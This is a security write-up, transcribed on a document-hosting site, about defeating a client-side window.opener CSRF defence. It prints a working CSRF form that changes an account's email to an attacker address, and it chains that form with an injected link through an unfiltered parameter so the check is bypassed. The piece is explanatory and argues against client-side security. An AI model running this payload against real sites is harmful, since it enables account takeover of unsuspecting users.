Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

Similar documents
Cross-Site Request Forgery in Cisco SG220 series

Application vulnerabilities and defences

WHY CSRF WORKS. Implicit authentication by Web browsers

JOE WIPING OUT CSRF

Robust Defenses for Cross-Site Request Forgery

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

JOE WIPING OUT CSRF

Common Websites Security Issues. Ziv Perry

More attacks on clients: Click-jacking/UI redressing, CSRF

Web basics: HTTP cookies

WEB SECURITY: XSS & CSRF

Cross-Site Request Forgery (CSRF) Attack Lab

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CIS 4360 Secure Computer Systems XSS

CS 161 Computer Security

CSCE 813 Internet Security Case Study II: XSS

Robust Defenses for Cross-Site Request Forgery Review

WEB SECURITY: WEB BACKGROUND

Exploiting and Defending: Common Web Application Vulnerabilities

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

RKN 2015 Application Layer Short Summary

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Web Security: Vulnerabilities & Attacks

Penetration Testing. James Walden Northern Kentucky University

Web Application Security

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

Penetration Test Report

JAMES BENNETT DJANGOCON EUROPE 3RD JUNE 2015 THE NET IS DARK AND FULL OF TERRORS

OWASP TOP 10. By: Ilia

Chrome Extension Security Architecture

Cross Site Request Forgery

Web Application Security. Philippe Bogaerts

Web Security. Thierry Sans

Web Security, Part 2

Progress Exchange June, Phoenix, AZ, USA 1

Project 2: Web Security

Assignment 6: Web Security

The security of Mozilla Firefox s Extensions. Kristjan Krips

Neat tricks to bypass CSRF-protection. Mikhail

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Security Course. WebGoat Lab sessions

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

CS 142 Winter Session Management. Dan Boneh

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

I was given the following web application: and the instruction could be found on the first page.

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

How to Configure SSL VPN Portal for Forcepoint NGFW TECHNICAL DOCUMENT

Robust Defenses for Cross-Site Request Forgery

HTML5 a clear & present danger

CORS Attacks. Author: Milad Khoshdel Blog: P a g e. CORS Attacks

Web Security II. Slides from M. Hicks, University of Maryland

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

EasyCrypt passes an independent security audit

Content Security Policy

CSCD 303 Essential Computer Security Fall 2018

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

XSS Homework. 1 Overview. 2 Lab Environment

Assignment, part 2. Statement and concepts INFO-0010

Welcome to the OWASP TOP 10

Sichere Software vom Java-Entwickler

Multi-Post XSRF Web App Exploitation, total pwnage

CSC 482/582: Computer Security. Cross-Site Security

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

COMP9321 Web Application Engineering

Biting the Hand that Feeds You

P2_L12 Web Security Page 1

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

WebGoat& WebScarab. What is computer security for $1000 Alex?

HTTP Protocol and Server-Side Basics

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

The HTTP protocol. Fulvio Corno, Dario Bonino. 08/10/09 http 1

Client-Side Security Using CORS

Client Side Injection on Web Applications

Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Preparing for the Cross Site Request Forgery Defense

Secure Parameter Filter (SPF) (AKA Protecting Vulnerable Applications with IIS7) Justin Clarke, Andrew Carey Nairn

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications

The Volunteer Space Sign-Up Sheet User Manual

CSRF in the Modern Age

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

COMP9321 Web Application Engineering

Information Security CS 526 Topic 11

CSCD 303 Essential Computer Security Fall 2017

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Web Security IV: Cross-Site Attacks

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Transcription:

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 1

Contents 1. Abstract... 3 2. Introduction... 3 3. Analysis... 4 4. Exploiting... 6 5. Conclusion... 7 Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 2

1. Abstract Due to the increase in use of Modern Web Application, Security is the main concern. For security the developer mostly relay on Client Side Validation Mechanism. Those security features makes web application more flexible and perform better but it comes with great cost. The client side validation is easy to bypass so 70% of web applications are vulnerable due client side validation mechanism. While I was working on a Web Application, I came across to an interesting security mechanism which prevent the CSRF Attack. 2. Introduction If we are talking about CSRF Protection, Then basically we think about 3 Fixes. 1) Referrer Check 2) Random Tokens Form Based 3) Cookie Based Random Tokens Now the CSRF protection which I am talking about right now was deployed by using a JavaScript Code, Which was totally on client side due to JavaScript nature. Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 3

3. Analysis As we can see the HTTP Header POST /home/accountsettings HTTP/1.1 Host: websecgeeks.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Referer: http://websecgeeks.com/ Connection: keep-alive Content-Length: 57 newemail=attacker@something.com&submit=save We can say that this code might be vulnerable to CSRF, as there is no Random Tokens exist. So I tried to test it by creating an html page like this <html> <body> <form action= http://websecgeeks.com/home/accountsettings method= POST > <input type= hidden name= newemail value= attacker@attacker.com /> <input type= hidden name= Submit value= Save /> <input type= submit value= Submit form /> </form> </body> </html> But when I execute this page in an authenticated session, the application logged out me immediately. I tried one more time and again the application logged out me. May be this application is validating the Referrer Value, so I manually added valid referrer value. But Application logged me out again. Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 4

After some time I found an interesting JavaScript Code which was reason behind this protection. The Code Was Like Below <script> if(window.opener ==null){ top.location.href= /homedirectory/logoutuser ; } </script> As we can see the code, we can clearly say that this code is looking for a windows opener value. If the opener value is equal to "null" then application will simply logged us out and terminate the session, which was very pretty if we talk about CSRF. According to Windows Opener Description. When a window is opened from another window, it maintains a reference to that first window as window.opener. If the current window has no opener, this method returns NULL. Windows Phone browser does not support window.opener. It is also not supported in IE if the opener is in a different security zone. Now anyhow we have to set the windows opener value to while doing CSRF attack. Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 5

4. Exploiting After analysis, I found a way from where we can create an Opener Value which is HREF HTML Tag. So I created two pages 1) xss.php 2) csrf3.html 1) Both pages are hosted on attacker web server, Currently assume as localhost "xss.php" is the page where I create a HREF link to the "csrf3.html" xss.php is passing a parameter called zip as GET method. Basically I keep the zip as un-filtered, so whatever you inject in this, will display on page as it as. So I injected the HREF TAG as Below <a href="http://127.0.0.1/csrf3.html">link For Target Application</a> 2) The second csrf3.html page will be like this as we seen in previous. <html> <body> <form action= http://websecgeeks.com/home/accountsettings method= POST > <input type= hidden name= newemail value= attacker@attacker.com /> <input type= hidden name= Submit value= Save /> <input type= submit value= Submit form /> </form> </body> </html> And final URL which should be sent to victim is http://127.0.0.1/xss.php?zip=<a href="http://127.0.0.1/csrf3.html">link For Target Application</a> Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 6

Below you can see the screen shot. 3. Now I am set. After clicking the Link given as HREF tag, I was able to open a new page in new tab without getting logout, and also able to Bypass the CSRF Security. 5. Conclusion As we already know that client side security is not a good idea. After this demonstration we can say that creating new idea about preventing web application attacks is pretty good, but it is important that how we implement them. Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page 7

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback